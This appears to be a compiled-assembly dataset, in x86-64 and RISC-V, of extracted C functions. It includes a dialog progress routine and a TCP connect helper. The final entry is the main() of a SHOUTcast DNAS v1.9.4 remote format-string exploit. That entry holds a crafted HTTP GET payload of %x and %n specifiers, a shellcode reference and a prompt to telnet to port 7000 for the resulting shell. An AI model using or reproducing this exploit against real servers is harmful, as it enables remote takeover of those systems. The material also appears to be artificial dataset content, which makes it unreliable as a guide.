HN_NOSPACE: .zero 4 .globl HN_DIVISOR_1000 .align 4 .type HN_DIVISOR_1000, @object .size HN_DIVISOR_1000, 4 HN_DIVISOR_1000: .zero 4 .globl HN_AUTOSCALE .align 4 .type HN_AUTOSCALE, @object .size HN_AUTOSCALE, 4 HN_AUTOSCALE: .zero 4 .globl FLABEL_MAX .align 4 .type FLABEL_MAX, @object .size FLABEL_MAX, 4 FLABEL_MAX: .zero 4 .globl FALSE .align 8 .type FALSE, @object .size FALSE, 8 FALSE: .zero 8 .globl DPV_STATUS_RUNNING .align 8 .type DPV_STATUS_RUNNING, @object .size DPV_STATUS_RUNNING, 8 DPV_STATUS_RUNNING: .zero 8 .globl DPV_STATUS_FAILED .align 8 .type DPV_STATUS_FAILED, @object .size DPV_STATUS_FAILED, 8 DPV_STATUS_FAILED: .zero 8 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_dprompt.c_dprompt_add_files_aug_v3_6.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "" .align 3 .LC1: .string "\\Zb" .align 3 .LC2: .string "\\Zn" .align 3 .LC3: .string " [\\Z%c%s%-*s%s%-*s\\Zn]\\n" .align 3 .LC4: .string " [%-*s%s%-*s]\\n" .align 3 .LC5: .string "\\Zr\\Z1" .align 3 .LC6: .string "\\Zr\\Z2" .align 3 .LC7: .string "%*s%3u%%%*s" .align 3 .LC8: .string "\\ZR" .align 3 .LC9: .string "\\Z%c\\Zr\\Z%c%s%s%s\\Zn" .align 3 .LC10: .string "%s" .align 3 .LC11: .string "..." .align 3 .LC12: .string "%s%-*s%s %c" .align 3 .LC13: .string " " .align 3 .LC14: .string "%-*s%s %s" .align 3 .LC15: .string " [%s]\\n" .align 3 .LC16: .string " \\n" .align 3 .LC17: .string "\n" .text .align 1 .type dprompt_add_files, @function dprompt_add_files: addi sp,sp,-208 sd s0,192(sp) sd s1,184(sp) addi s0,sp,208 sd s6,144(sp) sd s11,104(sp) sd ra,200(sp) sd s2,176(sp) sd s3,168(sp) sd s4,160(sp) sd s5,152(sp) sd s7,136(sp) sd s8,128(sp) sd s9,120(sp) sd s10,112(sp) la a4,__stack_chk_guard ld a5, 0(a4) sd a5, -120(s0) li a5, 0 sd a2,-184(s0) mv s6,a1 mv s1,a0 lla s11,.LANCHOR0 beq a1,zero,.L2 ld a5,0(s11) sd a5,-192(s0) .L3: lw a5,16(s11) lw a1,20(s11) ld a3,24(s11) addiw a5,a5,1 addi a5,a5,15 addiw s2,a1,16 andi a5,a5,-16 addi a4,s2,15 andi a4,a4,-16 sub sp,sp,a5 mv s5,sp sub sp,sp,a4 sd sp,-200(s0) sub sp,sp,a4 mv s4,sp sub sp,sp,a4 mv s3,sp beq a3,zero,.L56 ld a5,32(s11) bne a5,zero,.L111 .L56: li a5,98 li s7,52 sd a5,-208(s0) .L4: ld a5,-200(s0) sb zero,0(a5) ld a5,-184(s0) or a5,a1,a5 blt a5,zero,.L6 beq s6,zero,.L6 ld a5,0(s6) bge a5,zero,.L8 ld a5,48(s11) beq a5,zero,.L6 .L8: ld s8,-184(s0) lw a6,56(s11) ld a3,64(s11) ld a0,-200(s0) lla a7,.LC0 mv a5,s8 mv a4,a7 lla a2,.LC7 addiw a1,a1,1 call snprintf@plt ld a5,72(s11) beq a5,zero,.L6 lw a5,20(s11) li a4,100 li a3,50 mulw a5,a5,s8 remw a2,a5,a4 divw s8,a5,a4 ble a2,a3,.L9 addiw s8,s8,-1 .L9: ld s9,-200(s0) lw a2,80(s11) mv a0,s3 mv a1,s9 sb zero,0(s3) sb zero,0(s4) call strncat@plt lw a2,80(s11) add a1,s9,s8 add s8,s3,s8 mv a0,s4 sb zero,0(s8) call strncat@plt ld a3,-208(s0) mv a7,s4 lla a6,.LC8 mv a5,s3 mv a4,s7 lla a2,.LC9 mv a1,s2 mv a0,s9 call snprintf@plt .L6: li s4,0 li s3,0 beq s1,zero,.L10 li s7,0 lla s9,.LC10 lla s10,.LC0 .L51: ld a5,88(s11) lw s2,84(s11) ld s8,8(s1) addiw s4,s4,1 bne a5,zero,.L112 .L11: mv a1,s7 mv a0,s8 call dialog_prompt_numlines@plt mv a5,a0 li a1,1 mv a0,s8 addw s3,a5,s3 call dialog_prompt_lastline@plt mv a3,a0 beq s8,a0,.L12 lbu a5,0(a0) sd a0,-168(s0) sb zero,0(a0) mv a1,s8 mv a0,s9 sd a5,-176(s0) call dprompt_add@plt ld a3,-168(s0) ld a5,-176(s0) sb a5,0(a3) .L12: ld a5,88(s11) ld a4,104(s11) or a5,a5,a4 beq a5,zero,.L13 ld a5,72(s11) bne a5,zero,.L113 .L13: lw a5,20(s11) blt a5,zero,.L114 .L18: addiw a1,s2,1 mv a2,s9 mv a0,s5 mv s8,a1 call snprintf@plt bgt a0,s2,.L115 beq s6,s1,.L116 .L20: ld a5,72(s11) lla a3,.LC2 bne a5,zero,.L24 mv a3,s10 .L24: mv a1,s2 lla a4,.LC13 mv a2,s5 lla a0,.LC14 call dprompt_add@plt ld a3,16(s1) ld a1,24(s1) li a5,134 beq a3,zero,.L117 .L25: ld a7,72(s11) lla s2,.LC3 bne a7,zero,.L30 lla s2,.LC4 .L30: ld a4,128(s11) beq a4,a1,.L118 lw a1,152(s11) lw a4,156(s11) ld a0,160(s11) lla s8,.LC6 .L32: addiw a5,a5,-128 sext.w a6,a5 li a2,6 bgtu a6,a2,.L33 slli a6,a5,32 lla a2,.L35 srli a5,a6,30 add a5,a5,a2 lw a5,0(a5) add a5,a5,a2 jr a5 .section .rodata .align 2 .align 2 .L35: .word .L40-.L35 .word .L39-.L35 .word .L33-.L35 .word .L38-.L35 .word .L37-.L35 .word .L36-.L35 .word .L34-.L35 .text .L115: addi a0,s2,-3 lla a1,.LC11 add a0,s5,a0 call sprintf@plt bne s6,s1,.L20 .L116: ld a4,-184(s0) li a5,99 bgt a4,a5,.L20 mv a0,s5 call strlen@plt mv a1,a0 add a5,s5,s2 add a0,s5,a0 bltu a0,a5,.L119 .L21: ld a5,72(s11) bne a5,zero,.L120 mv s8,s10 mv a4,s10 .L22: sd a4,-168(s0) call spin_char@plt ld a4,-168(s0) mv a5,a0 mv a3,s5 mv a1,s8 mv a2,s2 lla a0,.LC12 call dprompt_add@plt ld a3,16(s1) ld a1,24(s1) li a5,134 bne a3,zero,.L25 .L117: lw a4,20(s11) li a5,130 blt a4,zero,.L25 li a2,3 li a5,131 ble a4,a2,.L25 ld a4,-192(s0) li a5,128 bne a4,zero,.L25 beq s6,s1,.L121 ld a4,48(s11) li a5,132 bne a4,zero,.L25 ld a5,0(s1) slti a5,a5,0 addi a5,a5,132 j .L25 .L34: lw a1,192(s11) ld a0,200(s11) mv a2,s9 addiw a1,a1,1 call snprintf@plt ld a0,200(s11) call strlen@plt lw a4,20(s11) sw a0,208(s11) ble a0,a4,.L45 ld a5,200(s11) sw zero,.LANCHOR0+212,a3 sw zero,.LANCHOR0+216,a3 add a5,a5,a4 sb zero,0(a5) lw a5,20(s11) lw a1,216(s11) lw a4,212(s11) sw a5,208(s11) .L46: ld a5,72(s11) ld a3,200(s11) beq a5,zero,.L48 mv a6,a4 mv a7,s10 mv a5,a3 lla a4,.LC0 j .L109 .L36: lw a3,180(s11) lw a5,184(s11) lw a1,20(s11) lw a4,188(s11) lw a2,32(s1) addi t3,s0,-152 or a5,a3,a5 addiw a1,a1,2 mv a3,s10 mv a0,t3 sd t3,-168(s0) call humanize_number@plt ld t3,-168(s0) mv a0,t3 call strlen@plt lw a3,20(s11) ld t3,-168(s0) subw a4,a3,a0 srliw a5,a4,31 addw a5,a5,a4 sraiw a1,a5,1 addw a0,a0,a1 addw a0,a0,a1 mv a4,a1 beq a0,a3,.L43 addiw a4,a1,1 .L43: ld a5,72(s11) beq a5,zero,.L44 mv a6,a4 mv a7,s10 mv a5,t3 lla a4,.LC0 j .L109 .L37: beq a7,zero,.L42 mv a6,a4 mv a7,s10 mv a5,a0 lla a4,.LC0 j .L109 .L38: lw a1,20(s11) beq a7,zero,.L49 lla a5,.LC0 mv a7,s10 li a6,0 mv a4,a5 .L109: mv a3,a1 ld a1,-208(s0) mv a2,s8 mv a0,s2 call dprompt_add@plt .L41: lw a5,220(s11) ble a5,s4,.L10 beq s6,s1,.L122 .L50: ld s1,40(s1) bne s1,zero,.L51 .L10: lw a5,224(s11) lla s1,.LC17 ble a5,s3,.L53 .L52: mv a0,s1 call dprompt_add@plt lw a5,224(s11) addiw s3,s3,1 bgt a5,s3,.L52 .L53: la a5,__stack_chk_guard ld a4, -120(s0) ld a5, 0(a5) xor a5, a4, a5 li a4, 0 bne a5,zero,.L123 addi sp,s0,-208 ld ra,200(sp) mv a0,s4 ld s0,192(sp) ld s1,184(sp) ld s2,176(sp) ld s3,168(sp) ld s4,160(sp) ld s5,152(sp) ld s6,144(sp) ld s7,136(sp) ld s8,128(sp) ld s9,120(sp) ld s10,112(sp) ld s11,104(sp) addi sp,sp,208 jr ra .L39: ld a1,-200(s0) lla a0,.LC15 call dprompt_add@plt j .L41 .L40: lw a4,168(s11) lw a3,172(s11) lw a1,176(s11) mv a5,s10 lla a2,.LC0 lla a0,.LC4 call dprompt_add@plt j .L41 .L33: lla a0,.LC16 call dprompt_add@plt j .L41 .L114: lw a5,16(s11) addiw a5,a5,-1 ble a5,s2,.L18 ld a4,112(s11) ld a5,0(s11) bne a4,a5,.L18 addiw s2,s2,2 j .L18 .L118: lw a1,136(s11) lw a4,140(s11) ld a0,144(s11) lla s8,.LC5 j .L32 .L112: lw a0,96(s11) call dialog_prompt_nlstate@plt mv s7,a0 j .L11 .L122: ld a5,8(s11) sd a5,-192(s0) j .L50 .L113: lbu a4,0(a3) beq a4,zero,.L14 mv a5,a3 li a0,92 j .L16 .L58: mv a4,a2 .L15: mv a5,a1 beq a4,zero,.L14 .L16: lbu a2,1(a5) addi a1,a5,1 bne a4,a0,.L58 bne a2,zero,.L124 .L14: lw a5,16(s11) mv a4,a5 ble a5,s2,.L17 mv a4,s2 .L17: sext.w s2,a4 j .L13 .L124: li a6,90 lbu a4,2(a5) addi a1,a5,2 bne a2,a6,.L15 beq a4,zero,.L14 lbu a4,3(a5) addiw s2,s2,3 addi a1,a5,3 j .L15 .L49: lla a3,.LC0 mv a5,s10 li a4,0 mv a2,a3 mv a0,s2 call dprompt_add@plt j .L41 .L44: mv a5,s10 mv a3,t3 lla a2,.LC0 mv a0,s2 call dprompt_add@plt j .L41 .L42: mv a3,a0 mv a5,s10 lla a2,.LC0 mv a0,s2 call dprompt_add@plt j .L41 .L48: mv a5,s10 lla a2,.LC0 mv a0,s2 call dprompt_add@plt j .L41 .L45: subw a5,a4,a0 sraiw a1,a5,1 addw a0,a0,a1 sw a1,216(s11) addw a0,a0,a1 beq a0,a4,.L125 addiw a4,a1,1 sw a4,212(s11) j .L46 .L120: lla s8,.LC1 lla a4,.LC2 j .L22 .L111: ld a5,40(s11) lbu s7,0(a5) lbu a5,2(a5) sd a5,-208(s0) j .L4 .L125: sw a1,212(s11) mv a4,a1 j .L46 .L2: ld a5,8(s11) sd a5,-192(s0) j .L3 .L119: lla a2,.LC11 subw a1,s8,a1 call snprintf@plt j .L21 .L121: ld a5,-200(s0) lbu a5,0(a5) bne a5,zero,.L27 ld a4,0(s6) li a5,133 blt a4,zero,.L25 ld a5,120(s11) sub a5,a5,a1 seqz a5,a5 addi a5,a5,132 j .L25 .L27: ld a5,48(s11) beq a5,zero,.L28 ld a2,-184(s0) li a4,99 li a5,132 bgt a2,a4,.L25 li a5,129 j .L25 .L28: ld a4,0(s6) ld a2,120(s11) slti a5,a4,0 addi a5,a5,132 bne a2,a1,.L25 srai a5,a4,63 andi a5,a5,4 addi a5,a5,129 j .L25 .L123: call __stack_chk_fail@plt .size dprompt_add_files, .-dprompt_add_files .globl use_shadow .globl use_libdialog .globl use_dialog .globl use_colors .globl use_color .globl pprompt .globl pend_rsize .globl pend_lsize .globl pend .globl pct_rsize .globl pct_lsize .globl pbar_size .globl no_labels .globl msg .globl mesg_size .globl mesg_rsize .globl mesg_lsize .globl label_size .globl gauge_color .globl fheight .globl fail_rsize .globl fail_lsize .globl fail .globl dwidth .globl done_rsize .globl done_lsize .globl done .globl display_limit .globl dialog_test .globl TRUE .globl PROMPT_MAX .globl HN_NOSPACE .globl HN_DIVISOR_1000 .globl HN_AUTOSCALE .globl FLABEL_MAX .globl FALSE .globl DPV_STATUS_RUNNING .globl DPV_STATUS_FAILED .bss .align 3 .set .LANCHOR0,. + 0 .type FALSE, @object .size FALSE, 8 FALSE: .zero 8 .type TRUE, @object .size TRUE, 8 TRUE: .zero 8 .type FLABEL_MAX, @object .size FLABEL_MAX, 4 FLABEL_MAX: .zero 4 .type pbar_size, @object .size pbar_size, 4 pbar_size: .zero 4 .type use_colors, @object .size use_colors, 8 use_colors: .zero 8 .type use_shadow, @object .size use_shadow, 8 use_shadow: .zero 8 .type gauge_color, @object .size gauge_color, 8 gauge_color: .zero 8 .type dialog_test, @object .size dialog_test, 8 dialog_test: .zero 8 .type pct_rsize, @object .size pct_rsize, 4 pct_rsize: .zero 4 .zero 4 .type pct_lsize, @object .size pct_lsize, 8 pct_lsize: .zero 8 .type use_color, @object .size use_color, 8 use_color: .zero 8 .type dwidth, @object .size dwidth, 4 dwidth: .zero 4 .type label_size, @object .size label_size, 4 label_size: .zero 4 .type use_dialog, @object .size use_dialog, 8 use_dialog: .zero 8 .type pprompt, @object .size pprompt, 4 pprompt: .zero 4 .zero 4 .type use_libdialog, @object .size use_libdialog, 8 use_libdialog: .zero 8 .type no_labels, @object .size no_labels, 8 no_labels: .zero 8 .type DPV_STATUS_RUNNING, @object .size DPV_STATUS_RUNNING, 8 DPV_STATUS_RUNNING: .zero 8 .type DPV_STATUS_FAILED, @object .size DPV_STATUS_FAILED, 8 DPV_STATUS_FAILED: .zero 8 .type fail_lsize, @object .size fail_lsize, 4 fail_lsize: .zero 4 .type fail_rsize, @object .size fail_rsize, 4 fail_rsize: .zero 4 .type fail, @object .size fail, 8 fail: .zero 8 .type done_lsize, @object .size done_lsize, 4 done_lsize: .zero 4 .type done_rsize, @object .size done_rsize, 4 done_rsize: .zero 4 .type done, @object .size done, 8 done: .zero 8 .type pend_rsize, @object .size pend_rsize, 4 pend_rsize: .zero 4 .type pend, @object .size pend, 4 pend: .zero 4 .type pend_lsize, @object .size pend_lsize, 4 pend_lsize: .zero 4 .type HN_NOSPACE, @object .size HN_NOSPACE, 4 HN_NOSPACE: .zero 4 .type HN_DIVISOR_1000, @object .size HN_DIVISOR_1000, 4 HN_DIVISOR_1000: .zero 4 .type HN_AUTOSCALE, @object .size HN_AUTOSCALE, 4 HN_AUTOSCALE: .zero 4 .type PROMPT_MAX, @object .size PROMPT_MAX, 4 PROMPT_MAX: .zero 4 .zero 4 .type msg, @object .size msg, 8 msg: .zero 8 .type mesg_size, @object .size mesg_size, 4 mesg_size: .zero 4 .type mesg_rsize, @object .size mesg_rsize, 4 mesg_rsize: .zero 4 .type mesg_lsize, @object .size mesg_lsize, 4 mesg_lsize: .zero 4 .type display_limit, @object .size display_limit, 4 display_limit: .zero 4 .type fheight, @object .size fheight, 4 fheight: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_23196.c_sock_connect_aug_v3_8
.file "extr_23196.c_sock_connect_aug_v3_8.c" .text .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC0: .string "[*] attempting to connect: %s:%d.\n" .section .rodata.str1.1,"aMS",@progbits,1 .LC1: .string "couldn't resolve hostname." .LC2: .string "netris connection failed." .section .rodata.str1.8 .align 8 .LC3: .string "[*] successfully connected: %s:%d.\n" .text .p2align 4 .globl sock_connect .type sock_connect, @function sock_connect: .LFB1: .cfi_startproc endbr64 pushq %r14 .cfi_def_cfa_offset 16 .cfi_offset 14, -16 pushq %r13 .cfi_def_cfa_offset 24 .cfi_offset 13, -24 pushq %r12 .cfi_def_cfa_offset 32 .cfi_offset 12, -32 movl %esi, %r12d pushq %rbp .cfi_def_cfa_offset 40 .cfi_offset 6, -40 movq %rdi, %rbp movzwl %r12w, %r12d pushq %rbx .cfi_def_cfa_offset 48 .cfi_offset 3, -48 subq $32, %rsp .cfi_def_cfa_offset 80 movl IPPROTO_TCP(%rip), %edx movl SOCK_STREAM(%rip), %esi movq %fs:40, %rax movq %rax, 24(%rsp) xorl %eax, %eax movl AF_INET(%rip), %edi leaq 12(%rsp), %r13 call socket@PLT movl %r12d, %edi movl %eax, %ebx movl AF_INET(%rip), %eax movl %eax, 20(%rsp) call htons@PLT movl %r12d, %edx movq %rbp, %rsi leaq .LC0(%rip), %rdi movl %eax, 16(%rsp) call printf@PLT movq %rbp, %rdi call inet_addr@PLT movl %eax, 12(%rsp) testl %eax, %eax jne .L15 .L2: movl sig_alarm(%rip), %esi movl SIGALRM(%rip), %edi call signal@PLT movl TIMEOUT(%rip), %edi call alarm@PLT movl $12, %edx movq %r13, %rsi movl %ebx, %edi call connect@PLT testq %rax, %rax jne .L16 .L4: xorl %edi, %edi call alarm@PLT movl %r12d, %edx movq %rbp, %rsi leaq .LC3(%rip), %rdi call printf@PLT movl %ebx, %eax movq 24(%rsp), %rdx subq %fs:40, %rdx jne .L17 addq $32, %rsp .cfi_remember_state .cfi_def_cfa_offset 48 popq %rbx .cfi_def_cfa_offset 40 popq %rbp .cfi_def_cfa_offset 32 popq %r12 .cfi_def_cfa_offset 24 popq %r13 .cfi_def_cfa_offset 16 popq %r14 .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L15: .cfi_restore_state movq %rbp, %rdi call gethostbyname@PLT movq %rax, %r14 testq %rax, %rax je .L18 .L3: leaq 12(%rsp), %r13 movq (%r14), %rsi movl $4, %edx movq %r13, %rdi call memcpy@PLT jmp .L2 .p2align 4,,10 .p2align 3 .L16: movl $1, %esi leaq .LC2(%rip), %rdi call printe@PLT jmp .L4 .p2align 4,,10 .p2align 3 .L18: movl $1, %esi leaq .LC1(%rip), %rdi call printe@PLT jmp .L3 .L17: call __stack_chk_fail@PLT .cfi_endproc .LFE1: .size sock_connect, .-sock_connect .globl sig_alarm .bss .align 4 .type sig_alarm, @object .size sig_alarm, 4 sig_alarm: .zero 4 .globl TIMEOUT .align 4 .type TIMEOUT, @object .size TIMEOUT, 4 TIMEOUT: .zero 4 .globl SOCK_STREAM .align 4 .type SOCK_STREAM, @object .size SOCK_STREAM, 4 SOCK_STREAM: .zero 4 .globl SIGALRM .align 4 .type SIGALRM, @object .size SIGALRM, 4 SIGALRM: .zero 4 .globl IPPROTO_TCP .align 4 .type IPPROTO_TCP, @object .size IPPROTO_TCP, 4 IPPROTO_TCP: .zero 4 .globl AF_INET .align 4 .type AF_INET, @object .size AF_INET, 4 AF_INET: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_23196.c_sock_connect_aug_v3_8.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "[*] attempting to connect: %s:%d.\n" .align 3 .LC1: .string "couldn't resolve hostname." .align 3 .LC2: .string "netris connection failed." .align 3 .LC3: .string "[*] successfully connected: %s:%d.\n" .text .align 1 .globl sock_connect .type sock_connect, @function sock_connect: addi sp,sp,-96 sd s0,80(sp) lla s0,.LANCHOR0 lw a2,0(s0) sd s3,56(sp) sd s4,48(sp) mv s3,a0 mv s4,a1 lw a0,8(s0) lw a1,4(s0) sd s5,40(sp) la s5,__stack_chk_guard ld a5, 0(s5) sd a5, 24(sp) li a5, 0 sd ra,88(sp) sd s1,72(sp) sd s2,64(sp) call socket@plt lw a5,8(s0) mv s1,a0 mv a0,s4 sw a5,16(sp) call htons@plt mv a5,a0 mv a2,s4 mv a1,s3 lla a0,.LC0 sw a5,12(sp) call printf@plt mv a0,s3 call inet_addr@plt sw a0,8(sp) addi s2,sp,8 bne a0,zero,.L15 .L2: lw a1,12(s0) lw a0,16(s0) call signal@plt lw a0,20(s0) call alarm@plt li a2,12 mv a1,s2 mv a0,s1 call connect@plt bne a0,zero,.L16 .L4: li a0,0 call alarm@plt mv a2,s4 mv a1,s3 lla a0,.LC3 call printf@plt slli a0,s1,48 ld a4, 24(sp) ld a5, 0(s5) xor a5, a4, a5 li a4, 0 srli a0,a0,48 bne a5,zero,.L17 ld ra,88(sp) ld s0,80(sp) ld s1,72(sp) ld s2,64(sp) ld s3,56(sp) ld s4,48(sp) ld s5,40(sp) addi sp,sp,96 jr ra .L15: mv a0,s3 call gethostbyname@plt mv s2,a0 beq a0,zero,.L18 .L3: ld a1,0(s2) addi s2,sp,8 li a2,4 mv a0,s2 call memcpy@plt j .L2 .L16: li a1,1 lla a0,.LC2 call printe@plt j .L4 .L18: li a1,1 lla a0,.LC1 call printe@plt j .L3 .L17: call __stack_chk_fail@plt .size sock_connect, .-sock_connect .globl sig_alarm .globl TIMEOUT .globl SOCK_STREAM .globl SIGALRM .globl IPPROTO_TCP .globl AF_INET .bss .align 2 .set .LANCHOR0,. + 0 .type IPPROTO_TCP, @object .size IPPROTO_TCP, 4 IPPROTO_TCP: .zero 4 .type SOCK_STREAM, @object .size SOCK_STREAM, 4 SOCK_STREAM: .zero 4 .type AF_INET, @object .size AF_INET, 4 AF_INET: .zero 4 .type sig_alarm, @object .size sig_alarm, 4 sig_alarm: .zero 4 .type SIGALRM, @object .size SIGALRM, 4 SIGALRM: .zero 4 .type TIMEOUT, @object .size TIMEOUT, 4 TIMEOUT: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_712.c_main_aug_v3_8
.file "extr_712.c_main_aug_v3_8.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string ".mp3 HTTP/1.0\r\n\r\n" .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC1: .string "SHOUTcast DNAS/Linux v1.9.4 format string remote exploit by pucik www.CC-Team.org" .section .rodata.str1.1 .LC2: .string "Usage: %s <host>\n" .LC3: .string "Cannot get IP of %s, %s!\n" .LC4: .string "Cannot connect to %s, %s!\n" .LC5: .string "[*] Sending first request ..." .section .rodata.str1.8 .align 8 .LC6: .string "[*] Sending second request ..." .align 8 .LC7: .ascii "GET /content/%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%" .ascii "x%x%x%x%x%x%x%x%x%x%xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .ascii "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .ascii "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .string "AAAAAAA-%n-AAAAAAAAAAAA-%n-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-%n-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-%n.mp3 HTTP/1.0\r\n\r\n" .section .rodata.str1.1 .LC8: .string "[*] Try telnet %s 7000 :)\n" .section .text.startup,"ax",@progbits .p2align 4 .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 pushq %r14 .cfi_def_cfa_offset 16 .cfi_offset 14, -16 movl $124, %ecx pushq %r13 .cfi_def_cfa_offset 24 .cfi_offset 13, -24 pushq %r12 .cfi_def_cfa_offset 32 .cfi_offset 12, -32 pushq %rbp .cfi_def_cfa_offset 40 .cfi_offset 6, -40 movl %edi, %ebp pushq %rbx .cfi_def_cfa_offset 48 .cfi_offset 3, -48 movq %rsi, %rbx subq $1056, %rsp .cfi_def_cfa_offset 1104 movdqa .LC9(%rip), %xmm0 movq shellcode(%rip), %rsi movq %fs:40, %rax movq %rax, 1048(%rsp) movl g_aug_volatile_9499(%rip), %eax leaq 16(%rsp), %r12 leaq 48(%rsp), %rdi movaps %xmm0, 16(%rsp) movdqa .LC10(%rip), %xmm0 movaps %xmm0, 32(%rsp) addl $1, %eax movl %eax, g_aug_volatile_9499(%rip) xorl %eax, %eax rep stosq movq %r12, %rdi call strcat@PLT movq %r12, %rdi leaq .LC0(%rip), %rsi call strcat@PLT leaq .LC1(%rip), %rdi call puts@PLT cmpl $2, %ebp jle .L12 .L2: movq 8(%rbx), %r13 movq %r13, %rdi call gethostbyname@PLT movq %rax, %rbx testq %rax, %rax je .L13 .L3: movl SOCK_STREAM(%rip), %esi movl PF_INET(%rip), %edi xorl %edx, %edx leaq 4(%rsp), %r14 call socket@PLT movl PORT(%rip), %edi movl %eax, %ebp movq (%rbx), %rax movl (%rax), %eax movl %eax, 12(%rsp) movl PF_INET(%rip), %eax movl %eax, 8(%rsp) call htons@PLT movl $4, %edx movq %r14, %rsi movl %ebp, %edi movl %eax, 4(%rsp) call connect@PLT cmpl $-1, %eax je .L14 .L4: leaq .LC5(%rip), %rdi call puts@PLT movq %r12, %rdi call strlen@PLT movq %r12, %rsi movl %ebp, %edi movl %eax, %edx call write@PLT movl %ebp, %edi call close@PLT movl SOCK_STREAM(%rip), %esi movl PF_INET(%rip), %edi xorl %edx, %edx call socket@PLT movl $4, %edx movq %r14, %rsi movl %eax, %edi movl %eax, %ebp call connect@PLT cmpl $-1, %eax je .L15 .L5: leaq .LC6(%rip), %rdi leaq .LC7(%rip), %r12 call puts@PLT movq %r12, %rdi call strlen@PLT movq %r12, %rsi movl %ebp, %edi movl %eax, %edx call write@PLT movl %ebp, %edi call close@PLT movq %r13, %rsi leaq .LC8(%rip), %rdi xorl %eax, %eax call printf@PLT movl $0, (%rsp) movl (%rsp), %eax cmpl $4, %eax jg .L6 .p2align 4,,10 .p2align 3 .L7: movl (%rsp), %eax addl $1, %eax movl %eax, (%rsp) movl (%rsp), %eax cmpl $4, %eax jle .L7 .L6: movq 1048(%rsp), %rax subq %fs:40, %rax jne .L16 addq $1056, %rsp .cfi_remember_state .cfi_def_cfa_offset 48 xorl %eax, %eax popq %rbx .cfi_def_cfa_offset 40 popq %rbp .cfi_def_cfa_offset 32 popq %r12 .cfi_def_cfa_offset 24 popq %r13 .cfi_def_cfa_offset 16 popq %r14 .cfi_def_cfa_offset 8 ret .L12: .cfi_restore_state movq (%rbx), %rsi leaq .LC2(%rip), %rdi xorl %eax, %eax call printf@PLT xorl %edi, %edi call exit@PLT jmp .L2 .L15: movl errno(%rip), %edi call strerror@PLT movl stderr(%rip), %edi movq %r13, %rdx leaq .LC4(%rip), %rsi movq %rax, %rcx call fprintf@PLT orl $-1, %edi call exit@PLT jmp .L5 .L14: movl errno(%rip), %edi call strerror@PLT movl stderr(%rip), %edi movq %r13, %rdx leaq .LC4(%rip), %rsi movq %rax, %rcx call fprintf@PLT orl $-1, %edi call exit@PLT jmp .L4 .L13: movl errno(%rip), %edi call strerror@PLT movl stderr(%rip), %edi movq %r13, %rdx leaq .LC3(%rip), %rsi movq %rax, %rcx call fprintf@PLT orl $-1, %edi call exit@PLT jmp .L3 .L16: call __stack_chk_fail@PLT .cfi_endproc .LFE0: .size main, .-main .globl stderr .bss .align 4 .type stderr, @object .size stderr, 4 stderr: .zero 4 .globl shellcode .align 8 .type shellcode, @object .size shellcode, 8 shellcode: .zero 8 .globl errno .align 4 .type errno, @object .size errno, 4 errno: .zero 4 .globl SOCK_STREAM .align 4 .type SOCK_STREAM, @object .size SOCK_STREAM, 4 SOCK_STREAM: .zero 4 .globl PORT .align 4 .type PORT, @object .size PORT, 4 PORT: .zero 4 .globl PF_INET .align 4 .type PF_INET, @object .size PF_INET, 4 PF_INET: .zero 4 .globl g_aug_volatile_9499 .data .align 4 .type g_aug_volatile_9499, @object .size g_aug_volatile_9499, 4 g_aug_volatile_9499: .long 5 .section .rodata.cst16,"aM",@progbits,16 .align 16 .LC9: .quad 7957688120643962183 .quad 4341823187834529140 .align 16 .LC10: .quad 4469829541791532617 .quad 2258711473555017 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
